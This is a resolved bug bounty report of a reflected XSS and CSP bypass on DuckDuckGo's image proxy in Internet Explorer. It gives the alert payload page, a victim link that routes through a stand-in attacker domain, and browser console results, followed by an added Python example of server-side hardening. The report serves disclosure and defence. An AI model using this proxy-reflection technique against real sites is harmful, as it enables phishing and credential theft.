XSS in Subdomain of DuckDuckGo
Medium
DuckDuckGo
Reported by mr_r3boot
Vulnerability Details
Technical details and impact analysis
Hi Team,
I would like to report a CSP bypass and a full-fledged reflected XSS on ```proxy.duckduckgo.com```.
# Description:
On the proxy domain, to prevent script execution, there is a CSP header with ```script-src``` set to none. To exploit this issue a remote attacker would need to submit a valid nonce generated by the Content Security Policy. But IE still does not support this header, as stated at ```https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP#Browser_compatibility```, so it is possible to bypass this restriction.
# Steps to Reproduce:
1. Host the following page on your domain.
```html
<html><script>alert(document.domain);</script></html>
```
2. Share the following URL with the victim.
```
https://proxy.duckduckgo.com/iur/?f=1&image_host=http://attackerdomain.com/xsspage
```
3. Once the victim opens the link in IE, he/she can see the script executed in the context of the duckduckgo domain.
# Browsers Tested on:
1. IE 11.192 - We can see script execution.
2. Microsoft Edge 41.16299.15.0 - ```CSP14321: Resource violated directive 'script-src 'none'' in Content-Security-Policy: inline script, in https://proxy.duckduckgo.com/iur/?f=1&image_host=http://138.197.172.108/index.html at line 1 column 8. Resource will be blocked.```
3. Mozilla Firefox 52 - ```Content Security Policy: The page's settings blocked the loading of a resource at self ("script-src 'none'"). Source: alert(document.domain);```
4. Google Chrome Version 68.0.3440.106 (Official Build) (64-bit) - ```Refused to execute inline script because it violates the following Content Security Policy directive: "script-src 'none'". Either the 'unsafe-inline' keyword, a hash ('sha256-LNFMfdZ+OpsZfPTkBYm2BOeU5h3C3lAC8Em3x/Rc9mA='), or a nonce ('nonce-...') is required to enable inline execution.```
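The browser results above show why a CSP of ```script-src 'none'``` on its own is not a complete control for a proxy that relays arbitrary upstream bytes: the outcome depends on the client honouring CSP. The following is an added example (not DuckDuckGo's code; the real ```/iur/``` handler is unknown and the function names are hypothetical) contrasting the behaviour the report describes with a server-side hardening that does not rely on the browser at all: validate by magic bytes that the relayed body is actually an image and set the content type from that, so a fetched HTML page is never served as a document on the proxy origin.

```python
# Added example, not DuckDuckGo's code. Models an image proxy like
# /iur/?image_host=... and shows a server-side check that works regardless
# of whether the client browser supports Content-Security-Policy.

IMAGE_MAGIC = {
    b"\x89PNG\r\n\x1a\n": "image/png",
    b"\xff\xd8\xff": "image/jpeg",
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
}

def sniff_image_type(body: bytes):
    """Return the MIME type implied by the body's magic bytes, or None."""
    for magic, mime in IMAGE_MAGIC.items():
        if body.startswith(magic):
            return mime
    if body[:4] == b"RIFF" and body[8:12] == b"WEBP":
        return "image/webp"
    return None

def weak_proxy_response(body: bytes, upstream_content_type: str) -> dict:
    """Behaviour the report describes: upstream bytes and upstream type relayed
    as-is, with only a CSP header. Upstream text/html becomes a document on
    the proxy origin, and script blocking is left to the browser."""
    return {"status": 200,
            "headers": {"Content-Type": upstream_content_type,
                        "Content-Security-Policy": "script-src 'none'"},
            "body": body}

def hardened_proxy_response(body: bytes, upstream_content_type: str) -> dict:
    """Hypothetical hardened handler: the upstream Content-Type is deliberately
    ignored; the type comes from the bytes, non-images are refused, and
    nosniff plus a sandboxing CSP are kept as defence in depth."""
    mime = sniff_image_type(body)
    if mime is None:
        return {"status": 415, "headers": {"Content-Type": "text/plain"},
                "body": b"unsupported media type"}
    return {"status": 200,
            "headers": {"Content-Type": mime,
                        "X-Content-Type-Options": "nosniff",
                        "Content-Security-Policy": "default-src 'none'; sandbox"},
            "body": body}

# Constructed sample inputs: the page from step 1 of the report, and a PNG header.
ATTACKER_HTML = b"<html><script>alert(document.domain);</script></html>"
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\rIHDR"
```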
## Impact
1. An attacker can host a spoofed login page and sniff all credentials.
2. It is possible to DoS the victim's browser.
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Weakness
Cross-site Scripting (XSS) - Reflected